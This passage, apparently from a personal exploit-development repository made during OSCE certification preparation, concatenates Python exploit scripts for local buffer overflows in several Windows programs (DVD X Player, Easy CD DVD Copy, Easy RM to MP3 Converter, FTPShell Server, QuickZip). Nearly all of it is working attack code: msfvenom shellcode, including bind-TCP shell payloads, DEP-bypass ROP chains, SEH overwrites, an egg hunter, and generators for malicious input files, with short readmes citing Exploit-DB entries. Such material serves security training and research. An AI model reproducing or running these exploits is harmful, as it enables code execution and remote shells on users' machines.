shellcode += "\xba\xad\xe1\xd9\x21\xda\xd8\xd9\x74\x24\xf4\x5e\x33"
shellcode += "\xc9\xb1\x31\x83\xee\xfc\x31\x56\x0f\x03\x56\xa2\x03"
shellcode += "\x2c\xdd\x54\x41\xcf\x1e\xa4\x26\x59\xfb\x95\x66\x3d"
shellcode += "\x8f\x85\x56\x35\xdd\x29\x1c\x1b\xf6\xba\x50\xb4\xf9"
shellcode += "\x0b\xde\xe2\x34\x8c\x73\xd6\x57\x0e\x8e\x0b\xb8\x2f"
shellcode += "\x41\x5e\xb9\x68\xbc\x93\xeb\x21\xca\x06\x1c\x46\x86"
shellcode += "\x9a\x97\x14\x06\x9b\x44\xec\x29\x8a\xda\x67\x70\x0c"
shellcode += "\xdc\xa4\x08\x05\xc6\xa9\x35\xdf\x7d\x19\xc1\xde\x57"
shellcode += "\x50\x2a\x4c\x96\x5d\xd9\x8c\xde\x59\x02\xfb\x16\x9a"
shellcode += "\xbf\xfc\xec\xe1\x1b\x88\xf6\x41\xef\x2a\xd3\x70\x3c"
shellcode += "\xac\x90\x7e\x89\xba\xff\x62\x0c\x6e\x74\x9e\x85\x91"
shellcode += "\x5b\x17\xdd\xb5\x7f\x7c\x85\xd4\x26\xd8\x68\xe8\x39"
shellcode += "\x83\xd5\x4c\x31\x29\x01\xfd\x18\x27\xd4\x73\x27\x05"
shellcode += "\xd6\x8b\x28\x39\xbf\xba\xa3\xd6\xb8\x42\x66\x93\x37"
shellcode += "\x09\x2b\xb5\xdf\xd4\xb9\x84\xbd\xe6\x17\xca\xbb\x64"
shellcode += "\x92\xb2\x3f\x74\xd7\xb7\x04\x32\x0b\xc5\x15\xd7\x2b"
shellcode += "\x7a\x15\xf2\x4f\x1d\x85\x9e\xa1\xb8\x2d\x04\xbe"
buffer = "\x41" * 260 # eip offset
#----------------------------------------#
# ROP Chain setup for VirtualProtect() #
#----------------------------------------#
# EAX = NOP (0x90909090) #
# ECX = lpOldProtect (ptr to W address) #
# EDX = NewProtect (0x40) #
# EBX = dwSize #
# ESP = lPAddress (automatic) #
# EBP = ReturnTo (ptr to jmp esp) #
# ESI = ptr to VirtualProtect() #
# EDI = ROP NOP (RETN) #
#----------------------------------------#
buffer += struct.pack('<L', 0x6033cda2) # POP EAX # RETN [Configuration.dll]
buffer += "MMMM" # compensate (filler)
buffer += "MMMM" # compensate (filler)
buffer += "WWWW" # compensate (filler)
buffer += "WWWW" # compensate (filler)
buffer += struct.pack('<L', 0x60366238) # ptr to &VirtualProtect() [IAT Configuration.dll]
buffer += struct.pack('<L', 0x6410b24d) # MOV EAX,DWORD PTR DS:[EAX] # RETN [NetReg.dll]
buffer += struct.pack('<L', 0x616385d8) # XCHG EAX,ESI # RETN 0x00 [EPG.dll]
buffer += struct.pack('<L', 0x61626545) # POP EBP # RETN [EPG.dll]
buffer += struct.pack('<L', 0x6035453b) # & push esp # ret 0x10 [Configuration.dll]
buffer += struct.pack('<L', 0x64022e0f) # POP EAX # RETN [MediaPlayerCtrl.dll]
buffer += struct.pack('<L', 0xfffffaff) # value to negate, will become 0x00000501
buffer += struct.pack('<L', 0x64037950) # NEG EAX # RETN [MediaPlayerCtrl.dll]
buffer += struct.pack('<L', 0x61640124) # XCHG EAX,EBX # RETN [EPG.dll]
buffer += struct.pack('<L', 0x64022e0f) # POP EAX # RETN [MediaPlayerCtrl.dll]
buffer += struct.pack('<L', 0xffffffc0) # value to negate, will become 0x00000040
buffer += struct.pack('<L', 0x64037950) # NEG EAX # RETN [MediaPlayerCtrl.dll]
buffer += struct.pack('<L', 0x61608ba2) # XCHG EAX,EDX # RETN [EPG.dll]
buffer += struct.pack('<L', 0x603636a4) # POP ECX # RETN [Configuration.dll]
buffer += struct.pack('<L', 0x6411cdfc) # &Writable location [NetReg.dll]
buffer += struct.pack('<L', 0x6162c3b0) # POP EDI # RETN [EPG.dll]
buffer += struct.pack('<L', 0x64041804) # RETN (ROP NOP) [MediaPlayerCtrl.dll]
buffer += struct.pack('<L', 0x640390d3) # POP EAX # RETN [MediaPlayerCtrl.dll]
buffer += struct.pack('<L', 0x90909090) # NOP
buffer += struct.pack('<L', 0x60358d9f) # PUSHAD # RETN [Configuration.dll]
buffer += "\x90" * 20
buffer += shellcode
buffer += "\x90" * 20
buffer += "\x43" * (1500-260-(4*25)-40-len(shellcode))
try:
    f = open("OpenMe.plf", "w")
    print "[+] Creating %s bytes evil payload.." % len(buffer)
    time.sleep(1)
    f.write(buffer)
    f.close()
    print "[+] File created. Load that shit up!"
except:
    print "File cannot be created"
================================================
FILE: Local Buffer Overflow/DVDXPlayerProv5.5/readme.md
================================================
### DVD X Player Pro v5.5
Local Buffer Overflow exploit with DEP bypass (ROP gadgets) using VirtualAlloc() & VirtualProtect() APIs.

================================================
FILE: Local Buffer Overflow/EasyCDDVDCopyv1.3.24/Exploit.py
================================================
#!/usr/bin/python
###############################################################################
# Exploit Title : Easy CD DVD Copy v1.3.24 - Local Buffer Overflow (SEH) #
# Exploit Author : Hashim Jawad #
# Twitter : @ihack4falafel #
# Author Website : ihack4falafel[.]com #
# Vendor Homepage : http://www.divxtodvd.net/index.htm #
# Vulnerable Software: http://www.divxtodvd.net/easy_cd_dvd_copy.exe #
# Tested on OS : Windows XP professional SP3 - (996 bytes offset) #
# Windows 7 Enterprise SP1 - (1008 bytes offset) #
# Windows 10 Professional 64bit - (988 bytes offset) #
# Steps to reproduce : #
# ~ Copy the content of OpenMe.txt #
# ~ Click on Register #
# ~ Paste content in "Enter User Name" field #
###############################################################################
import struct
#root@kali:~# msfvenom -p windows/exec CMD=calc.exe -b "\x00" -f python -v shellcode (220 bytes)
shellcode = ""
shellcode += "\xbf\xc6\xde\x94\x3e\xda\xd0\xd9\x74\x24\xf4\x5d"
shellcode += "\x31\xc9\xb1\x31\x31\x7d\x13\x03\x7d\x13\x83\xc5"
shellcode += "\xc2\x3c\x61\xc2\x22\x42\x8a\x3b\xb2\x23\x02\xde"
shellcode += "\x83\x63\x70\xaa\xb3\x53\xf2\xfe\x3f\x1f\x56\xeb"
shellcode += "\xb4\x6d\x7f\x1c\x7d\xdb\x59\x13\x7e\x70\x99\x32"
shellcode += "\xfc\x8b\xce\x94\x3d\x44\x03\xd4\x7a\xb9\xee\x84"
shellcode += "\xd3\xb5\x5d\x39\x50\x83\x5d\xb2\x2a\x05\xe6\x27"
shellcode += "\xfa\x24\xc7\xf9\x71\x7f\xc7\xf8\x56\x0b\x4e\xe3"
shellcode += "\xbb\x36\x18\x98\x0f\xcc\x9b\x48\x5e\x2d\x37\xb5"
shellcode += "\x6f\xdc\x49\xf1\x57\x3f\x3c\x0b\xa4\xc2\x47\xc8"
shellcode += "\xd7\x18\xcd\xcb\x7f\xea\x75\x30\x7e\x3f\xe3\xb3"
shellcode += "\x8c\xf4\x67\x9b\x90\x0b\xab\x97\xac\x80\x4a\x78"
shellcode += "\x25\xd2\x68\x5c\x6e\x80\x11\xc5\xca\x67\x2d\x15"
shellcode += "\xb5\xd8\x8b\x5d\x5b\x0c\xa6\x3f\x31\xd3\x34\x3a"
shellcode += "\x77\xd3\x46\x45\x27\xbc\x77\xce\xa8\xbb\x87\x05"
shellcode += "\x8d\x34\xc2\x04\xa7\xdc\x8b\xdc\xfa\x80\x2b\x0b"
shellcode += "\x38\xbd\xaf\xbe\xc0\x3a\xaf\xca\xc5\x07\x77\x26"
shellcode += "\xb7\x18\x12\x48\x64\x18\x37\x2b\xeb\x8a\xdb\x82"
shellcode += "\x8e\x2a\x79\xdb"
buffer = "A" * 988 # Junk
buffer += "\xeb\x14\x90\x90" # + nSEH (Jump Code)
buffer += struct.pack('<L', 0x10037b11) # + SEH (pop ebx # pop eax # ret | [SkinMagic.dll])
buffer += "\x90" * 50 # + NOP
buffer += shellcode # + shellcode
buffer += "\x90" * 50 # + NOP
try:
    f = open("OpenMe.txt", "w")
    print "[+] Creating %s bytes evil payload.." % len(buffer)
    f.write(buffer)
    f.close()
    print "[+] File created!"
except:
    print "File cannot be created"
================================================
FILE: Local Buffer Overflow/EasyCDDVDCopyv1.3.24/readme.md
================================================
### Easy CD DVD Copy v1.3.24
Structured Exception Handler (SEH) chain overwrite exploit found during my preparation for OSCE; see the link [EDB-ID: 44337](https://www.exploit-db.com/exploits/44337/)

================================================
FILE: Local Buffer Overflow/EasyRMtoMP3Converterv2.7.3.700/Exploit.py
================================================
#!/usr/bin/python
import struct
import time
import socket

def BufferOverflow():
    #------------------------------------------------------------------------------#
    # msfvenom -p windows/exec CMD=calc.exe -b "\x00\x09\x0A" -f python -v payload #
    #------------------------------------------------------------------------------#
    shellcode = ""
    shellcode += "\xdd\xc6\xd9\x74\x24\xf4\x5b\xbf\xd5\xc2\x64\xc2"
    shellcode += "\x2b\xc9\xb1\x31\x83\xeb\xfc\x31\x7b\x14\x03\x7b"
    shellcode += "\xc1\x20\x91\x3e\x01\x26\x5a\xbf\xd1\x47\xd2\x5a"
    shellcode += "\xe0\x47\x80\x2f\x52\x78\xc2\x62\x5e\xf3\x86\x96"
    shellcode += "\xd5\x71\x0f\x98\x5e\x3f\x69\x97\x5f\x6c\x49\xb6"
    shellcode += "\xe3\x6f\x9e\x18\xda\xbf\xd3\x59\x1b\xdd\x1e\x0b"
    shellcode += "\xf4\xa9\x8d\xbc\x71\xe7\x0d\x36\xc9\xe9\x15\xab"
    shellcode += "\x99\x08\x37\x7a\x92\x52\x97\x7c\x77\xef\x9e\x66"
    shellcode += "\x94\xca\x69\x1c\x6e\xa0\x6b\xf4\xbf\x49\xc7\x39"
    shellcode += "\x70\xb8\x19\x7d\xb6\x23\x6c\x77\xc5\xde\x77\x4c"
    shellcode += "\xb4\x04\xfd\x57\x1e\xce\xa5\xb3\x9f\x03\x33\x37"
    shellcode += "\x93\xe8\x37\x1f\xb7\xef\x94\x2b\xc3\x64\x1b\xfc"
    shellcode += "\x42\x3e\x38\xd8\x0f\xe4\x21\x79\xf5\x4b\x5d\x99"
    shellcode += "\x56\x33\xfb\xd1\x7a\x20\x76\xb8\x10\xb7\x04\xc6"
    shellcode += "\x56\xb7\x16\xc9\xc6\xd0\x27\x42\x89\xa7\xb7\x81"
    shellcode += "\xee\x58\xf2\x88\x46\xf1\x5b\x59\xdb\x9c\x5b\xb7"
    shellcode += "\x1f\x99\xdf\x32\xdf\x5e\xff\x36\xda\x1b\x47\xaa"
    shellcode += "\x96\x34\x22\xcc\x05\x34\x67\xaf\xc8\xa6\xeb\x1e"
    shellcode += "\x6f\x4f\x89\x5e"
    #------------------------------------------------------------------------------#
    # Payload layout                                                               #
    #------------------------------------------------------------------------------#
    # buffer  = AAA padding                                                        #
    # buffer += EIP overwrite | WinXP SP3 Pro : "\xFF\xE4" (jmp esp) | [USER32.dll] #
    # buffer += NOP sled                                                           #
    # buffer += Shellcode                                                          #
    # buffer += BBB padding                                                        #
    #------------------------------------------------------------------------------#
    buffer = "A" * 26065                                   # AAA padding
    buffer += struct.pack('<L', 0x7e47bcaf)                # EIP overwrite
    buffer += "\x90" * 40                                  # NOP sled
    buffer += shellcode                                    # shellcode
    buffer += "B" * (30000-26065-4-40-len(shellcode))      # BBB padding
    try:
        f = open("OpenMe.m3u", "w")
        print "[+] Creating %s bytes evil payload.." % len(buffer)
        time.sleep(1)
        f.write(buffer)
        f.close()
        print "[+] File created. Load that shit up!"
    except:
        print "File cannot be created"

def main():
    print (
    '''
    +-+-+-+-+ +-+-+ +-+-+ +-+-+-+ +-+-+-+-+-+-+-+-+-+ +-+-+-+-+-+-+-+-+-+-+
    |E|a|s|y| |R|M| |t|o| |M|P|3| |C|o|n|v|e|r|t|e|r| |v|2|.|7|.|3|.|7|0|0|
    +-+-+-+-+ +-+-+ +-+-+ +-+-+-+ +-+-+-+-+-+-+-+-+-+ +-+-+-+-+-+-+-+-+-+-+
    +-+-+-+-+-+ +-+-+-+-+-+-+ +-+-+-+-+-+-+-+-+
    |L|o|c|a|l| |B|u|f|f|e|r| |O|v|e|r|f|l|o|w|
    +-+-+-+-+-+ +-+-+-+-+-+-+ +-+-+-+-+-+-+-+-+
    '''
    )
    BufferOverflow()

if __name__ == '__main__':
    main()
================================================
FILE: Local Buffer Overflow/EasyRMtoMP3Converterv2.7.3.700/readme.md
================================================
### Easy RM to MP3 Converter v2.7.3.700
Yet another vanilla saved return pointer (EIP) overwrite to pop calc.exe, nothing fancy.

================================================
FILE: Local Buffer Overflow/FTPShellServerv6.80/Exploit.py
================================================
#!/usr/bin/python
#----------------------------------------------------------------------------------------------------------#
# Exploit Title : FTPShell Server v6.80 - Local Buffer Overflow (SafeSEH Bypass) #
# Exploit Author : Hashim Jawad - @ihack4falafel #
# Vendor Homepage : http://www.ftpshell.com/ #
# Vulnerable Software: http://www.ftpshell.com/downloadserver.htm #
# Tested on : Windows XP Professional SP3 #
# Steps to reproduce : paste contents of Evil.txt in 'Password' field under configure accounts>Change pass #
#----------------------------------------------------------------------------------------------------------#
'''
Notes:
=====
* All loaded modules, including the base binary, are compiled with /SAFESEH
* The null byte '\x00' gets mangled by the program and ends up as a space '\x20'
'''
#root@kali:~# msfvenom -p windows/exec cmd=calc.exe -e x86/alpha_mixed -b "\x00\x0a\x0d" -f python -v shellcode
#Payload size: 447 bytes
shellcode = ""
shellcode += "\x89\xe0\xd9\xed\xd9\x70\xf4\x5a\x4a\x4a\x4a\x4a"
shellcode += "\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x43\x43\x43\x43\x43"
shellcode += "\x43\x37\x52\x59\x6a\x41\x58\x50\x30\x41\x30\x41"
shellcode += "\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42"
shellcode += "\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x79"
shellcode += "\x6c\x7a\x48\x4c\x42\x67\x70\x73\x30\x57\x70\x43"
shellcode += "\x50\x4d\x59\x4b\x55\x36\x51\x59\x50\x61\x74\x4e"
shellcode += "\x6b\x56\x30\x46\x50\x6e\x6b\x61\x42\x56\x6c\x6c"
shellcode += "\x4b\x72\x72\x32\x34\x6e\x6b\x61\x62\x37\x58\x76"
shellcode += "\x6f\x38\x37\x72\x6a\x54\x66\x55\x61\x4b\x4f\x4e"
shellcode += "\x4c\x45\x6c\x30\x61\x71\x6c\x35\x52\x46\x4c\x45"
shellcode += "\x70\x6b\x71\x58\x4f\x44\x4d\x77\x71\x69\x57\x7a"
shellcode += "\x42\x6c\x32\x63\x62\x46\x37\x4e\x6b\x62\x72\x62"
shellcode += "\x30\x6e\x6b\x53\x7a\x47\x4c\x4c\x4b\x52\x6c\x74"
shellcode += "\x51\x52\x58\x6b\x53\x62\x68\x77\x71\x5a\x71\x62"
shellcode += "\x71\x4e\x6b\x76\x39\x57\x50\x36\x61\x4a\x73\x6e"
shellcode += "\x6b\x47\x39\x56\x78\x59\x73\x65\x6a\x52\x69\x6e"
shellcode += "\x6b\x57\x44\x6c\x4b\x67\x71\x4e\x36\x34\x71\x6b"
shellcode += "\x4f\x6e\x4c\x5a\x61\x58\x4f\x74\x4d\x76\x61\x4b"
shellcode += "\x77\x70\x38\x69\x70\x52\x55\x38\x76\x75\x53\x51"
shellcode += "\x6d\x59\x68\x65\x6b\x73\x4d\x65\x74\x43\x45\x78"
shellcode += "\x64\x61\x48\x6c\x4b\x36\x38\x67\x54\x76\x61\x49"
shellcode += "\x43\x73\x56\x4c\x4b\x76\x6c\x50\x4b\x6e\x6b\x31"
shellcode += "\x48\x77\x6c\x43\x31\x79\x43\x6e\x6b\x43\x34\x4c"
shellcode += "\x4b\x53\x31\x7a\x70\x4d\x59\x37\x34\x66\x44\x67"
shellcode += "\x54\x33\x6b\x53\x6b\x50\x61\x30\x59\x31\x4a\x63"
shellcode += "\x61\x69\x6f\x59\x70\x71\x4f\x51\x4f\x33\x6a\x6e"
shellcode += "\x6b\x76\x72\x6a\x4b\x6e\x6d\x33\x6d\x43\x5a\x63"
shellcode += "\x31\x6c\x4d\x6c\x45\x4c\x72\x47\x70\x45\x50\x33"
shellcode += "\x30\x56\x30\x53\x58\x74\x71\x4e\x6b\x62\x4f\x4f"
shellcode += "\x77\x59\x6f\x6b\x65\x6f\x4b\x4c\x30\x4f\x45\x6d"
shellcode += "\x72\x43\x66\x62\x48\x39\x36\x6a\x35\x6f\x4d\x4d"
shellcode += "\x4d\x59\x6f\x5a\x75\x47\x4c\x53\x36\x63\x4c\x55"
shellcode += "\x5a\x4f\x70\x49\x6b\x6d\x30\x31\x65\x53\x35\x6d"
shellcode += "\x6b\x62\x67\x37\x63\x30\x72\x62\x4f\x32\x4a\x55"
shellcode += "\x50\x70\x53\x79\x6f\x6e\x35\x31\x73\x71\x71\x30"
shellcode += "\x6c\x71\x73\x46\x4e\x43\x55\x51\x68\x35\x35\x35"
shellcode += "\x50\x41\x41"
buffer = '\xcc' * 2101 # filler to nSEH offset
buffer += '\xeb\x06\x90\x90' # nSEH | hop over SEH
buffer += '\x18\x05\xfc\x7f' # SEH | 0x7ffc0518 : pop edi # pop edi # ret [SafeSEH Bypass]
buffer += '\x90' * 10 # nops sled
buffer += shellcode # calc.exe
buffer += '\xcc' * (5000-2101-4-4-10-len(shellcode))
try:
f=open("Evil.txt","w")
print "[+] Creating %s bytes evil payload.." %len(buffer)
f.write(buffer)
f.close()
print "[+] File created!"
except Exception as e:
print e
================================================
FILE: Local Buffer Overflow/FTPShellServerv6.80/README.md
================================================
### FTPShell Server v6.80
Structured Exception Handler (SEH) overwrite exploit found during my prep to take on OSCE, had to look for an address outside the range of loaded modules (including base image) in order to bypass `safeSEH`. See the link [EDB-ID: 44713](https://www.exploit-db.com/exploits/44713/)
<p align="center">
<img src="https://github.com/ihack4falafel/OSCE/blob/master/Local%20Buffer%20Overflow/FTPShellServerv6.80/PoC.gif">
</p>
================================================
FILE: Local Buffer Overflow/QuickZipv4.60.019/Egg Hunter/Exploit.py
================================================
#!/usr/bin/python
#root@kali:~# msfvenom -p windows/shell_bind_tcp -b '\x00\x0a\x0d' -e x86/alpha_mixed BufferRegister=EDI -f python -v shellcode
#Payload size: 710 bytes
shellcode = "T00WT00W"
shellcode += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
shellcode += "\x49\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58"
shellcode += "\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42"
shellcode += "\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41"
shellcode += "\x42\x75\x4a\x49\x59\x6c\x58\x68\x4c\x42\x53\x30"
shellcode += "\x35\x50\x65\x50\x55\x30\x6d\x59\x38\x65\x56\x51"
shellcode += "\x79\x50\x73\x54\x6c\x4b\x46\x30\x36\x50\x6c\x4b"
shellcode += "\x56\x32\x44\x4c\x6e\x6b\x70\x52\x44\x54\x4c\x4b"
shellcode += "\x44\x32\x44\x68\x66\x6f\x68\x37\x33\x7a\x47\x56"
shellcode += "\x74\x71\x4b\x4f\x4c\x6c\x55\x6c\x53\x51\x51\x6c"
shellcode += "\x76\x62\x44\x6c\x67\x50\x4b\x71\x68\x4f\x44\x4d"
shellcode += "\x67\x71\x4f\x37\x59\x72\x7a\x52\x62\x72\x76\x37"
shellcode += "\x4e\x6b\x52\x72\x74\x50\x6e\x6b\x62\x6a\x57\x4c"
shellcode += "\x6c\x4b\x50\x4c\x77\x61\x30\x78\x38\x63\x67\x38"
shellcode += "\x76\x61\x5a\x71\x52\x71\x6c\x4b\x51\x49\x77\x50"
shellcode += "\x45\x51\x49\x43\x6e\x6b\x71\x59\x76\x78\x4d\x33"
shellcode += "\x37\x4a\x37\x39\x6c\x4b\x55\x64\x6e\x6b\x36\x61"
shellcode += "\x4b\x66\x34\x71\x49\x6f\x6e\x4c\x4b\x71\x78\x4f"
shellcode += "\x44\x4d\x73\x31\x48\x47\x64\x78\x6b\x50\x74\x35"
shellcode += "\x68\x76\x54\x43\x71\x6d\x69\x68\x45\x6b\x63\x4d"
shellcode += "\x54\x64\x52\x55\x4d\x34\x76\x38\x6e\x6b\x32\x78"
shellcode += "\x56\x44\x67\x71\x48\x53\x52\x46\x4e\x6b\x76\x6c"
shellcode += "\x30\x4b\x6c\x4b\x62\x78\x67\x6c\x47\x71\x6b\x63"
shellcode += "\x6e\x6b\x77\x74\x4c\x4b\x66\x61\x6a\x70\x4b\x39"
shellcode += "\x53\x74\x76\x44\x56\x44\x63\x6b\x51\x4b\x35\x31"
shellcode += "\x76\x39\x62\x7a\x33\x61\x39\x6f\x49\x70\x43\x6f"
shellcode += "\x61\x4f\x62\x7a\x6c\x4b\x62\x32\x7a\x4b\x4c\x4d"
shellcode += "\x43\x6d\x70\x68\x76\x53\x37\x42\x45\x50\x45\x50"
shellcode += "\x63\x58\x74\x37\x72\x53\x46\x52\x61\x4f\x66\x34"
shellcode += "\x30\x68\x70\x4c\x71\x67\x74\x66\x36\x67\x6b\x4f"
shellcode += "\x38\x55\x4f\x48\x6c\x50\x33\x31\x75\x50\x67\x70"
shellcode += "\x34\x69\x4b\x74\x31\x44\x62\x70\x42\x48\x54\x69"
shellcode += "\x4b\x30\x62\x4b\x63\x30\x39\x6f\x78\x55\x33\x5a"
shellcode += "\x46\x68\x46\x39\x66\x30\x38\x62\x4b\x4d\x61\x50"
shellcode += "\x30\x50\x47\x30\x46\x30\x65\x38\x68\x6a\x54\x4f"
shellcode += "\x69\x4f\x6b\x50\x59\x6f\x6b\x65\x6f\x67\x55\x38"
shellcode += "\x44\x42\x65\x50\x66\x71\x63\x6c\x4b\x39\x4a\x46"
shellcode += "\x33\x5a\x42\x30\x32\x76\x43\x67\x55\x38\x6a\x62"
shellcode += "\x69\x4b\x56\x57\x33\x57\x49\x6f\x78\x55\x73\x67"
shellcode += "\x31\x78\x6e\x57\x58\x69\x57\x48\x39\x6f\x79\x6f"
shellcode += "\x69\x45\x43\x67\x70\x68\x54\x34\x7a\x4c\x45\x6b"
shellcode += "\x78\x61\x69\x6f\x4b\x65\x63\x67\x6a\x37\x65\x38"
shellcode += "\x42\x55\x52\x4e\x72\x6d\x30\x61\x79\x6f\x6b\x65"
shellcode += "\x35\x38\x52\x43\x30\x6d\x71\x74\x67\x70\x4b\x39"
shellcode += "\x6b\x53\x31\x47\x62\x77\x31\x47\x76\x51\x49\x66"
shellcode += "\x33\x5a\x57\x62\x31\x49\x73\x66\x6d\x32\x6b\x4d"
shellcode += "\x53\x56\x69\x57\x73\x74\x67\x54\x55\x6c\x35\x51"
shellcode += "\x45\x51\x6c\x4d\x73\x74\x51\x34\x52\x30\x5a\x66"
shellcode += "\x45\x50\x42\x64\x71\x44\x42\x70\x32\x76\x53\x66"
shellcode += "\x50\x56\x47\x36\x36\x36\x50\x4e\x52\x76\x32\x76"
shellcode += "\x50\x53\x73\x66\x62\x48\x43\x49\x4a\x6c\x37\x4f"
shellcode += "\x6c\x46\x79\x6f\x4b\x65\x4c\x49\x59\x70\x30\x4e"
shellcode += "\x42\x76\x32\x66\x39\x6f\x50\x30\x51\x78\x74\x48"
shellcode += "\x6f\x77\x45\x4d\x35\x30\x49\x6f\x4e\x35\x6d\x6b"
shellcode += "\x6c\x30\x58\x35\x4e\x42\x46\x36\x73\x58\x6f\x56"
shellcode += "\x6f\x65\x6f\x4d\x4f\x6d\x69\x6f\x7a\x75\x65\x6c"
shellcode += "\x37\x76\x71\x6c\x45\x5a\x6d\x50\x79\x6b\x4b\x50"
shellcode += "\x33\x45\x46\x65\x6d\x6b\x57\x37\x56\x73\x64\x32"
shellcode += "\x52\x4f\x63\x5a\x47\x70\x51\x43\x49\x6f\x4a\x75"
shellcode += "\x41\x41"
####################### ZIP File Structure ########################
###################################################################
######################## Local File Header ########################
LocalFileHeader = '\x50\x4b\x03\x04' # local file header signature
LocalFileHeader += '\x14\x00' # version needed to extract 0x14 = 20 -> 2.0
LocalFileHeader += '\x00\x00' # general purpose bit flag
LocalFileHeader += '\x00\x00' # compression method
LocalFileHeader += '\xb7\xac' # file last modification time 0xacb7 -> H=21 M=37 S/2=23 -> 21:37:46 (DOS time stores seconds halved)
LocalFileHeader += '\xce\x34' # file last modification date 0x34ce -> Y=26 (1980+26) M=6 D=14 -> 2006/6/14
LocalFileHeader += '\x00\x00\x00' # CRC-32 '\x00' was left out to make sure we hit 25 bytes before file length
LocalFileHeader += '\x00\x00\x00\x00' # compressed size
LocalFileHeader += '\x00\x00\x00\x00' # uncompressed size
LocalFileHeader += '\xe4\x0f' # file name length 0x0fe4 = 4068 bytes
LocalFileHeader += '\x00\x00' # extra field length
LocalFileHeader += '\x00' # file name
#LocalFileHeader += '\x00' # extra filed
################## Central Directory File Header ##################
CDFileHeader = '\x50\x4b\x01\x02' # cd file header signature
CDFileHeader += '\x14\x00' # version made by 0x14 = 20 -> 2.0
CDFileHeader += '\x14\x00' # version needed to extract 0x14 = 20 -> 2.0
CDFileHeader += '\x00\x00' # general purpose bit flag
CDFileHeader += '\x00\x00' # compression method
CDFileHeader += '\xb7\xac' # file last modification time 0xacb7 -> H=21 M=37 S/2=23 -> 21:37:46 (DOS time stores seconds halved)
CDFileHeader += '\xce\x34' # file last modification date 0x34ce -> Y=26 (1980+26) M=6 D=14 -> 2006/6/14
CDFileHeader += '\x00\x00\x00\x00' # CRC-32
CDFileHeader += '\x00\x00\x00\x00' # compressed size
CDFileHeader += '\x00\x00\x00\x00' # uncompressed size
CDFileHeader += '\xe4\x0f' # file name length 0x0fe4 = 4068 bytes
CDFileHeader += '\x00\x00' # extra field length
CDFileHeader += '\x00\x00' # file comment length
CDFileHeader += '\x00\x00' # disk number where file starts
CDFileHeader += '\x01\x00' # internal file attributes BIT 0: apparent ASCII/text file
CDFileHeader += '\x24\x00\x00\x00' # external file attributes
CDFileHeader += '\x00\x00\x00\x00' # relative offset of local file header
#CDFileHeader += '\x00' # file name
#CDFileHeader += '\x00' # extra field
#CDFileHeader += '\x00' # file comment
################ End of Central Directory Record ##################
EOCDRHeader = '\x50\x4b\x05\x06' # End of central directory signature
EOCDRHeader += '\x00\x00' # number of this disk
EOCDRHeader += '\x00\x00' # disk where central directory starts
EOCDRHeader += '\x01\x00' # number of central directory records on this disk
EOCDRHeader += '\x01\x00' # total number of central directory records
EOCDRHeader += '\x12\x10\x00\x00' # size of central directory (4114 bytes)
EOCDRHeader += '\x02\x10\x00\x00' # offset of start of central directory, relative to start of archive
EOCDRHeader += '\x00\x00' # comment length
#EOCDRHeader += '\x00' # comment
#root@kali:~# msfvenom -a x86 --platform windows -e x86/alpha_mixed BufferRegister=EAX -b '\x00' < /opt/OSCE/Tools/EggHunter.bin
#Payload size: 118 bytes
EggHunter = 'PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJISVoqkzYovoPBCbbJDBqHzm6NuldECj3DhoLxBtdpfPaGNkijLoT5kZlobUywkOxgAA'
Evil = '\x41' * 10 # filler to egghunter
Evil += EggHunter # hunt baby hunt!
Evil += '\x42' * 47 # filler to the start of hand crafted shellcode
Evil += '\x54' # PUSH ESP * save stack pointer in edi (restored later by the decoded 'mov esp,edi')
Evil += '\x5F' # POP EDI
Evil += '\x54' # PUSH ESP * point eax to where we want to decode the otherwise bad shellcode
Evil += '\x58' # POP EAX
Evil += '\x05\x21\x13\x11\x11' # add eax,0x11111321
Evil += '\x05\x21\x16\x11\x11' # add eax,0x11111621
Evil += '\x2d\x06\x23\x22\x22' # sub eax,0x22222306
Evil += '\x50' # PUSH EAX
Evil += '\x5C' # POP ESP * move eax value into stack pointer
Evil += '\x25\x4A\x4D\x4E\x55' # AND EAX,554E4D4A * decode 'mov esp, edi;jmp eax'
Evil += '\x25\x35\x32\x31\x2A' # AND EAX,2A313235
Evil += '\x05\x44\x76\x77\x61' # ADD EAX,61777644
Evil += '\x05\x44\x65\x66\x51' # ADD EAX,51666544
Evil += '\x05\x34\x54\x55\x61' # ADD EAX,61555434
Evil += '\x2D\x33\x33\x33\x33' # SUB EAX,33333333
Evil += '\x50' # PUSH EAX
Evil += '\x25\x4A\x4D\x4E\x55' # AND EAX,554E4D4A * point eax to egg hunter shellcode
Evil += '\x25\x35\x32\x31\x2A' # AND EAX,2A313235
Evil += '\x05\x71\x75\x11\x11' # ADD EAX,11117571
Evil += '\x05\x71\x75\x11\x11' # ADD EAX,11117571
Evil += '\x05\x11\x35\x11\x11' # ADD EAX,11113511
Evil += '\x2D\x13\x25\x21\x33' # SUB EAX,33212513
Evil += '\x41' * (294-10-len(EggHunter)-47-82)
Evil += '\x75\x9f\x74\x9f' # nSEH JZ & JNZ (aka jump net)
Evil += '\x41\x16\x40\x00' # SEH pop esi,pop ebx, retn in QuickZip.exe
Evil += shellcode # egg + shellcode
Evil += '\x41' * (4064-294-4-4-len(shellcode))
Evil += '.txt'
buffer = LocalFileHeader
buffer += Evil
buffer += CDFileHeader
buffer += Evil
buffer += EOCDRHeader
try:
f=open("Evil.zip","w")
print "[+] Creating %s bytes evil payload.." %len(buffer)
f.write(buffer)
f.close()
print "[+] File created!"
except Exception as e:
print e
================================================
FILE: Local Buffer Overflow/QuickZipv4.60.019/OS Dependent/Exploit.py
================================================
#!/usr/bin/python
# root@kali:~# msfvenom -p windows/shell_bind_tcp -b '\x00\x0a\x0d' -e x86/alpha_mixed BufferRegister=EAX -f python -v shellcode
# Payload size: 710 bytes
shellcode = ""
shellcode += "\x50\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
shellcode += "\x49\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58"
shellcode += "\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42"
shellcode += "\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41"
